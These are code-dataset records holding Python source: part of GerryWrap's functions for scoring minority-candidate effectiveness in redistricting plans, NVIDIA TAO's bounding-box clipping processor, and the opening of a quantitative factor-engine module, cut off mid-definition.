statewide/equal modes\n for elec in primary_elecs + runoff_elecs:\n black_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'BCVAP')), \"Candidate\"].values[\n 0]\n hisp_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'HCVAP')), \"Candidate\"].values[\n 0]\n\n for district in range(num_districts):\n if elec in primary_elecs:\n black_pref_cands_prim_state.at[\n black_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_prim_state.at[\n hisp_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n else:\n black_pref_cands_runoffs_state.at[\n black_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_runoffs_state.at[\n hisp_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n min_cand_black_W2_state, min_cand_hisp_W2_state, min_cand_neither_W2_state = compute_W2(elec_sets, \\\n range(num_districts),\n min_cand_weights_dict,\n black_pref_cands_prim_state,\n hisp_pref_cands_prim_state,\n cand_race_dict)\n\n # compute final election weights (for statewide and equal scores) by taking product of W1, W2,\n # and W3 for each election set and district #Note: because these are statewide weights,\n # an election set will have the same weight across districts\n black_weight_state = recency_W1 * min_cand_black_W2_state * black_conf_W3_state\n hisp_weight_state = recency_W1 * min_cand_hisp_W2_state * hisp_conf_W3_state\n neither_weight_state = recency_W1 * min_cand_neither_W2_state * neither_conf_W3_state\n\n # equal-score weights are all 1\n black_weight_equal = np.ones((len(elec_sets), num_districts))\n hisp_weight_equal = np.ones((len(elec_sets), num_districts))\n neither_weight_equal = np.ones((len(elec_sets), num_districts))\n\n return black_weight_state, hisp_weight_state, neither_weight_state, black_weight_equal, \\\n hisp_weight_equal, neither_weight_equal, black_pref_cands_prim_state, hisp_pref_cands_prim_state, \\\n black_pref_cands_runoffs_state, hisp_pref_cands_runoffs_state\n\n\ndef compute_district_weights(dist_changes, elec_sets, elec_set_dict, state_gdf, partition, prec_draws_outcomes, \\\n geo_id, primary_elecs, runoff_elecs, elec_match_dict, bases, outcomes, \\\n recency_W1, cand_race_dict, min_cand_weights_dict):\n \"\"\"\n Returns election weights for the district score for Black, Latino and Neither\n effectiveness. Election weights differ across districts, as it uses district-specific preferred\n candidates. It also returns dataframes of district-specific\n Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n\n black_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n # store runoff preferences for instances where minority-preferred candidate needs to switch between primary and runoff\n black_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n\n black_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n hisp_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n neither_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n\n for district in dist_changes:\n state_gdf[\"New Map\"] = state_gdf.index.map(dict(partition.assignment))\n dist_prec_list = list(state_gdf[state_gdf[\"New Map\"] == district][geo_id])\n dist_prec_indices = state_gdf.index[state_gdf[geo_id].isin(dist_prec_list)].tolist()\n district_support_all = cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes)\n\n black_pref_prob_single_dist = []\n hisp_pref_prob_single_dist = []\n\n for elec_set in elec_sets:\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Primary'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_prob_dist = HCVAP_support_elec[hisp_pref_cand_dist]\n hisp_pref_prob_single_dist.append(hisp_pref_prob_dist)\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Primary'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_prob_dist = BCVAP_support_elec[black_pref_cand_dist]\n black_pref_prob_single_dist.append(black_pref_prob_dist)\n\n black_pref_cands_prim_dist.at[\n black_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n hisp_pref_cands_prim_dist.at[\n hisp_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n if 'Runoff' in elec_set_dict[elec_set].keys():\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Runoff'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_cands_runoffs_dist.at[\n hisp_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Runoff'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_cands_runoffs_dist.at[\n black_pref_cands_runoffs_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n\n black_pref_conf_single_dist = [prob_conf_conversion(x) for x in black_pref_prob_single_dist]\n black_conf_W3_dist = np.append(black_conf_W3_dist, np.array([black_pref_conf_single_dist]).transpose(), axis=1)\n\n hisp_pref_conf_single_dist = [prob_conf_conversion(x) for x in hisp_pref_prob_single_dist]\n hisp_conf_W3_dist = np.append(hisp_conf_W3_dist, np.array([hisp_pref_conf_single_dist]).transpose(), axis=1)\n\n neither_pref_conf_single_dist = [prob_conf_conversion(x * y) for x, y in\n zip(black_pref_prob_single_dist, hisp_pref_prob_single_dist)]\n neither_conf_W3_dist = np.append(neither_conf_W3_dist, np.array([neither_pref_conf_single_dist]).transpose(),\n axis=1)\n\n # compute W2 (\"in-group\"-minority-preference weight)\n min_cand_black_W2_dist, min_cand_hisp_W2_dist, min_cand_neither_W2_dist = compute_W2(elec_sets, \\\n dist_changes,\n min_cand_weights_dict,\n black_pref_cands_prim_dist,\n hisp_pref_cands_prim_dist,\n cand_race_dict)\n ################################################################################ \n # compute final election weights per district\n recency_W1 = recency_W1.copy()[:, dist_changes]\n black_weight_dist = recency_W1 * min_cand_black_W2_dist * black_conf_W3_dist\n hisp_weight_dist = recency_W1 * min_cand_hisp_W2_dist * hisp_conf_W3_dist\n neither_weight_dist = recency_W1 * min_cand_neither_W2_dist * neither_conf_W3_dist\n\n return black_weight_dist, hisp_weight_dist, neither_weight_dist, black_pref_cands_prim_dist, \\\n black_pref_cands_runoffs_dist, hisp_pref_cands_prim_dist, hisp_pref_cands_runoffs_dist\n\n\ndef prob_conf_conversion(cand_prob):\n # parameters chosen to be ~0 confidence until 50% then rapid ascension to confidence ~ 1\n cand_conf = 1 / (1 + np.exp(18 - 26 * cand_prob))\n return cand_conf\n\n\ndef compute_final_dist(map_winners, black_pref_cands_df, black_pref_cands_runoffs, \\\n hisp_pref_cands_df, hisp_pref_cands_runoffs, neither_weight_array, \\\n black_weight_array, hisp_weight_array, dist_elec_results, dist_changes,\n cand_race_table, num_districts, candidates, \\\n elec_sets, elec_set_dict, mode, partition, logit_params, logit=False):\n \"\"\"\n Returns (Latino, Black, Neither, Overlap) effectiveness distribution for each district. \n The four values sum to one. State-specific rules governing what counts as a \"win\" for \n an election set are coded here (for example, rules about advancing to runoff elections etc.).\n \"\"\"\n general_winners = map_winners[map_winners[\"Election Type\"] == 'General'].reset_index(drop=True)\n primary_winners = map_winners[map_winners[\"Election Type\"] == 'Primary'].reset_index(drop=True)\n runoff_winners = map_winners[map_winners[\"Election Type\"] == 'Runoff'].reset_index(drop=True)\n\n black_pref_wins = np.empty((len(elec_sets), 0), float)\n hisp_pref_wins = np.empty((len(elec_sets), 0), float)\n\n primary_second_df = pd.DataFrame(columns=range(num_districts))\n primary_second_df[\"Election Set\"] = elec_sets\n\n prim_share_hpc = pd.DataFrame(columns=range(num_districts))\n prim_share_hpc[\"Election Set\"] = elec_sets\n prim_share_bpc = pd.DataFrame(columns=range(num_districts))\n prim_share_bpc[\"Election Set\"] = elec_sets\n party_gen_winner = pd.DataFrame(columns=range(num_districts))\n party_gen_winner[\"Election Set\"] = elec_sets\n\n primary_races = [elec_set_dict[elec_set][\"Primary\"] for elec_set in elec_sets]\n runoff_races = [None if 'Runoff' not in elec_set_dict[elec_set].keys() else elec_set_dict[elec_set][\"Runoff\"] for\n elec_set in elec_sets]\n cand_party_dict = cand_race_table.set_index(\"Candidates\").to_dict()[\"Party\"]\n\n for dist in dist_changes:\n black_pref_cands = list(black_pref_cands_df[dist])\n hisp_pref_cands = list(hisp_pref_cands_df[dist])\n\n primary_dict = primary_winners.set_index(\"Election Set\").to_dict()[dist]\n general_dict = general_winners.set_index(\"Election Set\").to_dict()[dist]\n runoffs_dict = runoff_winners.set_index(\"Election Set\").to_dict()[dist]\n primary_winner_list = [primary_dict[es] for es in elec_sets]\n general_winner_list = [general_dict[es] for es in elec_sets]\n runoff_winner_list = [\"N/A\" if es not in list(runoff_winners[\"Election Set\"]) \\\n else runoffs_dict[es] for es in elec_sets]\n\n primary_race_share_dict = {primary_race: dist_elec_results[primary_race][dist] for primary_race in\n primary_races}\n primary_ranking = {primary_race: {key: rank for rank, key in \\\n enumerate(sorted(primary_race_share_dict[primary_race], \\\n key=primary_race_share_dict[primary_race].get, reverse=True),\n 1)} \\\n for primary_race in primary_race_share_dict.keys()}\n\n second_place_primary = {primary_race: [cand for cand, value in primary_ranking[primary_race].items() \\\n if primary_ranking[primary_race][cand] == 2] for primary_race in\n primary_races}\n\n primary_second_df[dist] = [second_place_primary[key][0] for key in second_place_primary.keys()]\n\n black_pref_prim_rank = [primary_ranking[pr][bpc] for pr, bpc in zip(primary_races, black_pref_cands)]\n hisp_pref_prim_rank = [primary_ranking[pr][hpc] for pr, hpc in zip(primary_races, hisp_pref_cands)]\n\n prim_share_hpc[dist] = [primary_race_share_dict[prim_race][hpc] for prim_race, hpc in\n zip(primary_races, hisp_pref_cands)]\n prim_share_bpc[dist] = [primary_race_share_dict[prim_race][bpc] for prim_race, bpc in\n zip(primary_races, black_pref_cands)]\n party_general_winner = [cand_party_dict[gw] for gw in general_winner_list]\n party_gen_winner[dist] = party_general_winner\n\n # we always care who preferred candidate is in runoff if the minority preferred primary\n # candidate wins in district primary\n runoff_black_pref = [\"N/A\" if rw == \"N/A\" else \\\n bpc for rw, bpc in zip(runoff_winner_list, list(black_pref_cands_runoffs[dist]))]\n\n runoff_hisp_pref = [\"N/A\" if rw == \"N/A\" else \\\n hpc for rw, hpc in zip(runoff_winner_list, list(hisp_pref_cands_runoffs[dist]))]\n\n # winning conditions (conditions to accrue points for election set/minority group):\n black_accrue = [(prim_win == bpc and party_win == 'D') if run_race == None else \\\n ((bpp_rank < 3 and run_win == runbp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][bpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, bpc, party_win, bpp_rank, run_win, runbp, prim_race \\\n in zip(runoff_races, primary_winner_list, black_pref_cands, \\\n party_general_winner, black_pref_prim_rank, runoff_winner_list, \\\n runoff_black_pref, primary_races)]\n\n black_pref_wins = np.append(black_pref_wins, np.array([black_accrue]).transpose(), axis=1)\n\n hisp_accrue = [(prim_win == hpc and party_win == 'D') if run_race == None else \\\n ((hpp_rank < 3 and run_win == runhp and party_win == 'D') or \\\n (primary_race_share_dict[prim_race][hpc] > .5 and party_win == 'D')) \\\n for run_race, prim_win, hpc, party_win, hpp_rank, run_win, runhp, \\\n prim_race in zip(runoff_races, primary_winner_list, hisp_pref_cands, \\\n party_general_winner, hisp_pref_prim_rank, runoff_winner_list, \\\n runoff_hisp_pref, primary_races)]\n\n hisp_pref_wins = np.append(hisp_pref_wins, np.array([hisp_accrue]).transpose(), axis=1)\n\n neither_pref_wins = (1 - black_pref_wins) * (1 - hisp_pref_wins)\n\n if len(black_weight_array[0]) > 2:\n black_weight_array = black_weight_array[:, dist_changes]\n hisp_weight_array = hisp_weight_array[:, dist_changes]\n neither_weight_array = neither_weight_array[:, dist_changes]\n\n # election set weight's number of points are accrued if Black or Latino preferred candidate(s) win (or proxies do)\n neither_points_accrued = neither_weight_array * neither_pref_wins\n black_points_accrued = black_weight_array * black_pref_wins\n hisp_points_accrued = hisp_weight_array * hisp_pref_wins\n\n #####################################################################################\n # Compute district probabilities: Black, Latino, Neither and Overlap\n black_vra_elec_wins = list(np.sum(black_points_accrued, axis=0) / np.sum(black_weight_array, axis=0))\n black_gc = [min(1, (partition[\"BCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n black_vra_prob = [i * j for i, j in zip(black_vra_elec_wins, black_gc)]\n\n hisp_vra_elec_wins = list(np.sum(hisp_points_accrued, axis=0) / np.sum(hisp_weight_array, axis=0))\n hisp_gc = [min(1, (partition[\"HCVAP\"][i] / partition[\"CVAP\"][i]) * 2) for i in sorted(dist_changes)]\n hisp_vra_prob = [i * j for i, j in zip(hisp_vra_elec_wins, hisp_gc)]\n\n neither_vra_prob = list(np.sum(neither_points_accrued, axis=0) / np.sum(neither_weight_array, axis=0))\n\n # feed through logit:\n if logit == True:\n logit_coef_black = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'coef'].values[0]\n logit_intercept_black = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Black'), 'intercept'].values[0]\n logit_coef_hisp = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'coef'].values[\n 0]\n logit_intercept_hisp = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Latino'), 'intercept'].values[0]\n logit_coef_neither = \\\n logit_params.loc[(logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'coef'].values[\n 0]\n logit_intercept_neither = logit_params.loc[\n (logit_params['model_type'] == mode) & (logit_params['subgroup'] == 'Neither'), 'intercept'].values[0]\n\n black_vra_prob = [1 / (1 + np.exp(-(logit_coef_black * y + logit_intercept_black))) for y in black_vra_prob]\n hisp_vra_prob = [1 / (1 + np.exp(-(logit_coef_hisp * y + logit_intercept_hisp))) for y in hisp_vra_prob]\n neither_vra_prob = [1 / (1 + np.exp(-(logit_coef_neither * y + logit_intercept_neither))) for y in\n neither_vra_prob]\n\n min_neither = [0 if (black_vra_prob[i] + hisp_vra_prob[i]) > 1 else 1 - (black_vra_prob[i] + hisp_vra_prob[i]) for i\n in range(len(dist_changes))]\n max_neither = [1 - max(black_vra_prob[i], hisp_vra_prob[i]) for i in range(len(dist_changes))]\n\n # uses ven diagram overlap/neither method\n final_neither = [round(min_neither[i], 3) if neither_vra_prob[i] < min_neither[i] else round(max_neither[i], 3) \\\n if neither_vra_prob[i] > max_neither[i] else round(neither_vra_prob[i], 3) for i in range(len(dist_changes))]\n final_overlap = [round(final_neither[i] + black_vra_prob[i] + hisp_vra_prob[i] - 1, 3) for i in\n range(len(dist_changes))]\n final_black_prob = [round(black_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n final_hisp_prob = [round(hisp_vra_prob[i] - final_overlap[i], 3) for i in range(len(dist_changes))]\n\n # when fitting logit, comment in:\n # final_neither = neither_vra_prob\n # final_overlap = [\"N/A\"]*len(dist_changes)\n # final_black_prob = black_vra_prob #[black_vra_prob[i] - final_overlap[i] for i in range(len(dist_changes))]\n # final_hisp_prob = hisp_vra_prob\n\n return dict(zip(dist_changes, zip(final_hisp_prob, final_black_prob, final_neither, final_overlap)))\n\n\ndef compute_W2(elec_sets, districts, min_cand_weights_dict, black_pref_cands_df, hisp_pref_cands_df, \\\n cand_race_dict):\n \"\"\"\n Returns in-group preferred candidate election weight (W2). This weight is 1 if the Latino-preferred\n candidate is Latino, etc.\n \"\"\"\n\n min_cand_black_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_hisp_W2 = np.empty((len(elec_sets), 0), float)\n min_cand_neither_W2 = np.empty((len(elec_sets), 0), float)\n\n for dist in districts:\n black_pref = list(black_pref_cands_df[dist])\n\n black_pref_race = [cand_race_dict[bp] for bp in black_pref]\n black_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Black\" in bpr else \\\n min_cand_weights_dict[\"Other\"] for bpr in black_pref_race]\n min_cand_black_W2 = np.append(min_cand_black_W2, np.array([black_cand_weight]).transpose(), axis=1)\n\n hisp_pref = list(hisp_pref_cands_df[dist])\n hisp_pref_race = [cand_race_dict[hp] for hp in hisp_pref]\n hisp_cand_weight = [min_cand_weights_dict[\"Relevant Minority\"] if \"Hispanic\" in hpr else \\\n min_cand_weights_dict[\"Other\"] for hpr in hisp_pref_race]\n min_cand_hisp_W2 = np.append(min_cand_hisp_W2, np.array([hisp_cand_weight]).transpose(), axis=1)\n\n neither_cand_weight = [min_cand_weights_dict['Relevant Minority'] if ('Hispanic' in hpr and 'Black' in bpr) else \\\n min_cand_weights_dict['Other'] if ('Hispanic' not in hpr and 'Black' not in bpr) else \\\n min_cand_weights_dict['Partial '] for bpr, hpr in\n zip(black_pref_race, hisp_pref_race)]\n min_cand_neither_W2 = np.append(min_cand_neither_W2, np.array([neither_cand_weight]).transpose(), axis=1)\n\n return min_cand_black_W2, min_cand_hisp_W2, min_cand_neither_W2\n\n\ndef cand_pref_all_draws_outcomes(prec_quant_df, precs, bases, outcomes, sample_size=1000):\n \"\"\"\n To aggregrate precinct EI to district EI for district model score\n \"\"\"\n quant_vals = np.array([0, 125, 250, 375, 500, 625, 750, 875, 1000])\n draws = {}\n for outcome in outcomes.keys():\n draw_base_list = []\n for base in outcomes[outcome]:\n dist_prec_quant = prec_quant_df.copy()\n vec_rand = np.random.rand(sample_size, len(dist_prec_quant))\n vec_rand_shift = np.array(dist_prec_quant[base + '.' + '0']) + sum(\n np.minimum(np.maximum(vec_rand - quant_vals[qv] / 1000, 0), .125) * 8 * np.array(\n dist_prec_quant[base + '.' + str(quant_vals[qv + 1])] - dist_prec_quant[\n base + '.' + str(quant_vals[qv])]) for qv in range(len(quant_vals) - 1))\n draw_base_list.append(vec_rand_shift.astype('float32').T)\n draws[outcome] = np.transpose(np.stack(draw_base_list), (1, 0, 2))\n return draws\n\n\ndef cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes):\n dist_draws = {}\n for outcome in outcomes:\n summed_outcome = prec_draws_outcomes[outcome][dist_prec_indices].sum(axis=0)\n unique, counts = np.unique(np.argmax(summed_outcome, axis=0), return_counts=True)\n prefs = {x.split('.')[1].split('_counts')[0]: 0.0 for x in outcomes[outcome]}\n prefs_counts = dict(zip(unique, counts))\n prefs.update(\n {outcomes[outcome][key].split('.')[1].split('_counts')[0]: prefs_counts[key] / len(summed_outcome[0]) for\n key in prefs_counts.keys()})\n dist_draws[outcome] = prefs\n return dist_draws\n","repo_name":"scott-norris-math/GerryWrap","sub_path":"src/run_functions.py","file_name":"run_functions.py","file_ext":"py","file_size_in_byte":25903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20610523041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_FIRST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.data_format import CHANNELS_LAST\nfrom nvidia_tao_tf1.blocks.multi_source_loader.processors.processor import (\n Processor,\n)\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import LABEL_OBJECT\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import SequenceExample\nfrom nvidia_tao_tf1.blocks.multi_source_loader.types import TransformedExample\nfrom nvidia_tao_tf1.core.coreobject import save_args\nfrom nvidia_tao_tf1.core.types import Example\n\n\nclass BboxClipper(Processor):\n \"\"\"Processor for adjusting bounding box labels after cropping.\n\n The following changes need to be made to bounding box labels:\n 1) Labels completely out of the network's input are discarded.\n 2) Labels that are 'half-in, half-out' should have their coordinates clipped to the input\n crop.\n 3) Labels from 2) also should have their ``truncation_type`` updated accordingly.\n \"\"\"\n\n @save_args\n def __init__(self, crop_left=0, crop_right=0, crop_top=0, crop_bottom=0):\n \"\"\"Constructor.\n\n If all of the provided crop coordinates are or 0, this processor will amount to a no-op.\n\n Args:\n crop_left (int): Left-most coordinate of the crop region.\n crop_right (int): Right-most coordinate of the crop region.\n crop_top (int): Top-most coordinate of the crop region.\n crop_bottom (int): Bottom-most coordinate of the crop region.\n\n Raises:\n ValueError: if crop_left > crop_right, or crop_top > crop_bottom.\n \"\"\"\n super(BboxClipper, self).__init__()\n self._no_op = False\n all_crop_coords = {crop_left, crop_right, crop_top, crop_bottom}\n if all_crop_coords == {0}:\n self._no_op = True\n\n if not self._no_op:\n if crop_left >= crop_right or crop_top >= crop_bottom:\n raise ValueError(\n \"Provided crop coordinates result in a non-sensical crop-region.\"\n )\n\n self._crop_left = float(crop_left)\n self._crop_right = float(crop_right)\n self._crop_bottom = float(crop_bottom)\n self._crop_top = float(crop_top)\n\n @property\n def supported_formats(self):\n \"\"\"Data formats supported by this processor.\n\n Returns:\n data_formats (list of 'DataFormat'): Input data formats that this processor supports.\n \"\"\"\n return [CHANNELS_FIRST, CHANNELS_LAST]\n\n def can_compose(self, other):\n \"\"\"\n Determine whether two processors can be composed into a single one.\n\n Args:\n other (Processor): Other processor instance.\n\n Returns:\n (bool): True if this processor knows how to compose the other processor.\n \"\"\"\n return False\n\n def compose(self, other):\n \"\"\"Compose two processors into a single one.\"\"\"\n raise NotImplementedError(\"BboxClipper.compose not supported.\")\n\n def _get_indices_inside_crop(self, coords):\n \"\"\"Get indices for bounding boxes that are at least partially inside the crop region.\n\n Args:\n coords (tf.Tensor): Float tensor of shape (N, 4) where N is the number of bounding\n boxes. Each bbox has coordinates in the order [L, T, R, B].\n\n Returns:\n valid_indices (tf.Tensor): Boolean tensor of shape (N,) indicating which bounding boxes\n in the input are at least partially inside the crop region.\n \"\"\"\n valid_indices = tf.ones(tf.shape(input=coords)[0], dtype=tf.bool)\n\n # False if left-most coordinate is to the right of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 0], self._crop_right)\n )\n # False if right-most coordinate is to the left of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 2], self._crop_left)\n )\n # False if top-most coordinate is to the bottom of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.less(coords[:, 1], self._crop_bottom)\n )\n # False if bottom-most coordinate is to the top of the crop's region.\n valid_indices = tf.logical_and(\n valid_indices, tf.greater(coords[:, 3], self._crop_top)\n )\n\n return valid_indices\n\n def _adjust_truncation_type(self, bbox_2d_label):\n \"\"\"Adjust the truncation_type of a label if it is half-in, half-out of the crop.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance for which we will update the\n truncation_type.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n if isinstance(bbox_2d_label.truncation_type, tf.SparseTensor):\n new_coords = bbox_2d_label.vertices.coordinates.values\n # Get LTRB.\n x1, y1, x2, y2 = (\n new_coords[::4],\n new_coords[1::4],\n new_coords[2::4],\n new_coords[3::4],\n )\n\n left_most_in = tf.logical_and(\n tf.greater_equal(x1, self._crop_left),\n tf.less_equal(x1, self._crop_right),\n )\n top_most_in = tf.logical_and(\n tf.greater_equal(y1, self._crop_top),\n tf.less_equal(y1, self._crop_bottom),\n )\n right_most_in = tf.logical_and(\n tf.greater_equal(x2, self._crop_left),\n tf.less_equal(x2, self._crop_right),\n )\n bottom_most_in = tf.logical_and(\n tf.greater_equal(y2, self._crop_top),\n tf.less_equal(y2, self._crop_bottom),\n )\n # Needs adjustment if top-left corner is inside and bottom-right corner is outside, or\n # vice versa.\n half_in_half_out = tf.math.logical_xor(\n tf.logical_and(left_most_in, top_most_in),\n tf.logical_and(right_most_in, bottom_most_in),\n )\n\n old_truncation_type = bbox_2d_label.truncation_type\n new_truncation_type_values = tf.cast(\n tf.logical_or(\n tf.cast(\n old_truncation_type.values, dtype=tf.bool\n ), # Why is this int32??\n half_in_half_out,\n ),\n dtype=tf.int32,\n )\n\n new_truncation_type = tf.SparseTensor(\n values=new_truncation_type_values,\n indices=old_truncation_type.indices,\n dense_shape=old_truncation_type.dense_shape,\n )\n\n return bbox_2d_label._replace(truncation_type=new_truncation_type)\n\n # This corresponds to the case where the `truncation_type` field is not present.\n return bbox_2d_label\n\n def _clip_to_crop_region(self, bbox_2d_label):\n \"\"\"Clip the coordinates to the crop region.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to clip.\n\n Returns:\n clipped_label (Bbox2DLabel): Clipped version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n xmin, ymin, xmax, ymax = (\n input_coords[::4],\n input_coords[1::4],\n input_coords[2::4],\n input_coords[3::4],\n )\n\n xmin = tf.clip_by_value(xmin, self._crop_left, self._crop_right)\n ymin = tf.clip_by_value(ymin, self._crop_top, self._crop_bottom)\n xmax = tf.clip_by_value(xmax, self._crop_left, self._crop_right)\n ymax = tf.clip_by_value(ymax, self._crop_top, self._crop_bottom)\n\n clipped_coords = tf.stack([xmin, ymin, xmax, ymax], axis=1)\n clipped_coords = tf.reshape(clipped_coords, [-1]) # Flatten.\n\n new_coords = tf.SparseTensor(\n values=clipped_coords,\n indices=bbox_2d_label.vertices.coordinates.indices,\n dense_shape=bbox_2d_label.vertices.coordinates.dense_shape,\n )\n new_vertices = bbox_2d_label.vertices._replace(coordinates=new_coords)\n\n return bbox_2d_label._replace(vertices=new_vertices)\n\n def _adjust_bbox_2d_label(self, bbox_2d_label):\n \"\"\"Apply adjustments due to cropping to bounding box labels.\n\n Args:\n bbox_2d_label (Bbox2DLabel): Label instance to apply the adjustments to.\n\n Returns:\n adjusted_label (Bbox2DLabel): Adjusted version of ``bbox_2d_label``.\n \"\"\"\n input_coords = bbox_2d_label.vertices.coordinates.values\n # For convenience, reshape input coordinates.\n input_coords = tf.reshape(input_coords, [-1, 4]) # Order is L, T, R, B.\n\n # First, figure out which ones are completely outside the crop.\n valid_indices = self._get_indices_inside_crop(input_coords)\n\n adjusted_label = bbox_2d_label.filter(valid_indices)\n\n # Now, determine, which ones need to have their coordinates clipped and truncation_type\n # adjusted.\n adjusted_label = self._adjust_truncation_type(adjusted_label)\n adjusted_label = self._clip_to_crop_region(adjusted_label)\n\n return adjusted_label\n\n def process(self, example):\n \"\"\"\n Process an example.\n\n Args:\n example (Example): Example with frames in format specified by data_format.\n\n Returns:\n (Example): Processed example.\n\n Raises:\n ValueError: Since this processor explicitly needs to be applied after transformations\n (if they are present), it does not accept TransformedExample.\n \"\"\"\n if isinstance(example, TransformedExample):\n raise ValueError(\n \"BboxClipper should be applied on labels that have been transformed.\"\n )\n\n if not self._no_op:\n if isinstance(example, (Example, SequenceExample)):\n if LABEL_OBJECT in example.labels:\n example.labels[LABEL_OBJECT] = self._adjust_bbox_2d_label(\n bbox_2d_label=example.labels[LABEL_OBJECT]\n )\n\n return example\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/blocks/multi_source_loader/processors/bbox_clipper.py","file_name":"bbox_clipper.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3891210019","text":"from typing import Union, Iterable, Tuple, Dict\nimport warnings\nfrom .factor import BaseFactor\nfrom .filter import FilterFactor, StaticAssets\nfrom .datafactor import ColumnDataFactor, AdjustedColumnDataFactor\nfrom ..plotting import plot_quantile_and_cumulative_returns, plot_chart\nfrom ..data import DataLoader\nfrom ..parallel import ParallelGroupBy\nimport pandas as pd\nimport numpy as np\nimport torch\n\n\nclass OHLCV:\n open = ColumnDataFactor(inputs=('',), should_delay=False)\n high = ColumnDataFactor(inputs=('',))\n low = ColumnDataFactor(inputs=('',))\n close = ColumnDataFactor(inputs=('',))\n volume = ColumnDataFactor(inputs=('',))\n\n\nclass FactorEngine:\n \"\"\"\n Engine for compute factors, used for back-testing and alpha-research both.\n \"\"\"\n\n # friend private:\n\n @property\n def dataframe_(self):\n return self._dataframe\n\n @property\n def loader_(self):\n return self._loader\n\n def get_group_(self, group_name):\n return self._groups[group_name]\n\n def column_to_tensor_(self, data_column) -> torch.Tensor:\n # cache data with column prevent double copying\n if data_column in self._column_cache:\n return self._column_cache[data_column]\n\n series = self._dataframe[data_column]\n data = torch.from_numpy(series.values).to(self._device, non_blocking=True)\n self._column_cache[data_column] = data\n return data\n\n def column_to_parallel_groupby_(self, group_column: str, as_group_name=None):\n if as_group_name is None:\n as_group_name = group_column\n if as_group_name in self._groups:\n return\n\n series = self._dataframe[group_column]\n if series.dtype.name == 'category':\n cat = series.cat.codes\n else:\n cat = series.values\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups[as_group_name] = ParallelGroupBy(keys)\n\n def revert_(self, data: torch.Tensor, group: str, factor_name: str) -> torch.Tensor:\n return self._groups[group].revert(data, factor_name)\n\n def revert_to_series_(self, data: torch.Tensor, group: str, factor_name: str) -> pd.Series:\n array = self.revert_(data, group, factor_name).cpu()\n return pd.Series(array, index=self._dataframe.index)\n\n def group_by_(self, data: 